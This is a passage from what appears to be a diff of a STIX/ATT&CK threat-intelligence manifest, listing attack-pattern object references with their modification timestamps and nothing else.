"attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "object_modified": "2023-10-13T17:57:04.993Z" + }, + { + "object_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "object_modified": "2023-09-18T22:33:57.556Z" + }, + { + "object_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "object_modified": "2023-07-28T17:34:51.250Z" + }, + { + "object_ref": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", + "object_modified": "2022-10-20T20:16:32.599Z" + }, + { + "object_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "object_modified": "2024-04-28T15:43:30.271Z" + }, + { + "object_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "object_modified": "2023-09-11T16:06:10.376Z" + }, + { + "object_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "object_modified": "2024-04-19T04:27:00.005Z" + }, + { + "object_ref": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "object_modified": "2024-03-28T00:01:08.337Z" + }, + { + "object_ref": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "object_modified": "2023-10-13T17:57:05.190Z" + }, + { + "object_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "object_modified": "2023-10-13T17:57:05.375Z" + }, + { + "object_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "object_modified": "2024-01-20T00:07:58.958Z" + }, + { + "object_ref": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--54456690-84de-4538-9101-643e26437e09", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "object_modified": "2024-03-01T15:35:38.299Z" + }, + { + "object_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "object_modified": "2024-04-16T12:28:59.928Z" + }, + { + "object_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "object_modified": "2022-10-18T22:45:19.607Z" + }, + { + "object_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "object_modified": "2024-04-15T23:00:33.493Z" + }, + { + "object_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "object_modified": "2023-10-03T03:44:46.935Z" + }, + { + "object_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "object_modified": "2023-10-13T17:57:05.576Z" + }, + { + "object_ref": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92", + "object_modified": "2024-04-11T21:24:42.680Z" + }, + { + "object_ref": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "object_modified": "2023-08-14T19:19:54.148Z" + }, + { + "object_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761", + "object_modified": "2023-12-14T16:28:24.680Z" + }, + { + "object_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "object_modified": "2023-10-13T17:57:05.776Z" + }, + { + "object_ref": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "object_modified": "2024-02-26T14:21:37.818Z" + }, + { + "object_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "object_modified": "2023-03-30T21:01:53.857Z" + }, + { + "object_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "object_modified": "2024-04-16T12:45:06.434Z" + }, + { + "object_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "object_modified": "2023-10-13T17:57:05.975Z" + }, + { + "object_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "object_modified": "2023-10-13T17:57:06.171Z" + }, + { + "object_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "object_modified": "2023-04-12T23:52:08.194Z" + }, + { + "object_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "object_modified": "2024-02-28T21:22:52.176Z" + }, + { + "object_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "object_modified": "2023-08-11T15:26:41.941Z" + }, + { + "object_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "object_modified": "2024-03-07T14:27:04.770Z" + }, + { + "object_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "object_modified": "2024-04-12T02:34:58.003Z" + }, + { + "object_ref": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "object_modified": "2023-10-16T17:40:37.995Z" + }, + { + "object_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "object_modified": "2023-10-13T17:57:06.362Z" + }, + { + "object_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "object_modified": "2024-01-31T03:17:42.004Z" + }, + { + "object_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "object_modified": "2023-10-13T17:57:06.577Z" + }, + { + "object_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "object_modified": "2024-04-16T12:40:58.536Z" + }, + { + "object_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "object_modified": "2024-02-28T21:11:27.088Z" + }, + { + "object_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "object_modified": "2023-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "object_modified": "2023-12-27T17:57:20.003Z" + }, + { + "object_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "object_modified": "2024-04-15T20:52:09.908Z" + }, + { + "object_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "object_modified": "2024-02-14T21:24:37.780Z" + }, + { + "object_ref": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "object_modified": "2023-08-11T20:21:55.610Z" + }, + { + "object_ref": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "object_modified": "2024-03-07T14:33:34.201Z" + }, + { + "object_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "object_modified": "2024-04-16T12:19:08.953Z" + }, + { + "object_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "object_modified": "2023-03-30T21:01:46.711Z" + }, + { + "object_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "object_modified": "2022-10-21T14:30:10.979Z" + }, + { + "object_ref": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", + "object_modified": "2023-09-08T21:03:35.477Z" + }, + { + "object_ref": "attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "object_modified": "2024-04-18T23:47:54.553Z" + }, + { + "object_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "object_modified": "2023-10-03T17:38:21.121Z" + }, + { + "object_ref": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "object_modified": "2024-03-28T15:30:09.313Z" + }, + { + "object_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "object_modified": "2023-07-28T14:40:54.580Z" + }, + { + "object_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", + "object_modified": "2022-10-26T18:01:20.520Z" + }, + { + "object_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "object_modified": "2020-10-27T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "object_modified": "2024-01-12T23:36:56.245Z" + }, + { + "object_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "object_modified": "2024-02-14T21:50:32.531Z" + }, + { + "object_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "object_modified": "2024-02-01T04:37:36.774Z" + }, + { + "object_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--772bc7a8-a157-42cc-8728-d648e25c7fe7", + "object_modified": "2021-01-27T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "object_modified": "2024-01-24T00:04:01.066Z" + }, + { + "object_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "object_modified": "2023-04-15T00:25:36.502Z" + }, + { + "object_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "object_modified": "2024-04-08T18:54:40.925Z" + }, + { + "object_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "object_modified": "2023-10-13T17:57:06.780Z" + }, + { + "object_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "object_modified": "2024-04-16T12:40:10.978Z" + }, + { + "object_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "object_modified": "2023-09-29T20:30:58.300Z" + }, + { + "object_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "object_modified": "2023-04-14T23:23:30.327Z" + }, + { + "object_ref": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "object_modified": "2023-10-03T17:38:39.065Z" + }, + { + "object_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "object_modified": "2024-03-28T03:53:28.299Z" + }, + { + "object_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "object_modified": "2023-03-22T14:19:50.768Z" + }, + { + "object_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "object_modified": "2024-02-26T14:26:14.364Z" + }, + { + "object_ref": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", + "object_modified": "2021-01-27T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--800f9819-7007-4540-a520-40e655876800", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--804c042c-cfe6-449e-bc1a-ba0a998a70db", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "object_modified": "2022-10-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "object_modified": "2023-10-03T16:40:15.445Z" + }, + { + "object_ref": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "object_modified": "2024-04-15T21:33:00.213Z" + }, + { + "object_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "object_modified": "2023-10-13T17:57:06.993Z" + }, + { + "object_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "object_modified": "2022-10-19T22:01:05.551Z" + }, + { + "object_ref": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", + "object_modified": "2024-04-28T15:57:26.842Z" + }, + { + "object_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "object_modified": "2024-04-11T20:22:14.359Z" + }, + { + "object_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "object_modified": "2023-10-13T17:57:07.260Z" + }, + { + "object_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "object_modified": "2023-10-13T17:57:07.457Z" + }, + { + "object_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "object_modified": "2023-09-19T21:25:10.511Z" + }, + { + "object_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "object_modified": "2023-09-30T22:18:46.711Z" + }, + { + "object_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "object_modified": "2024-01-10T17:57:36.177Z" + }, + { + "object_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "object_modified": "2023-09-15T19:08:16.882Z" + }, + { + "object_ref": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", + "object_modified": "2023-04-14T22:27:04.095Z" + }, + { + "object_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "object_modified": "2023-10-17T02:12:05.242Z" + }, + { + 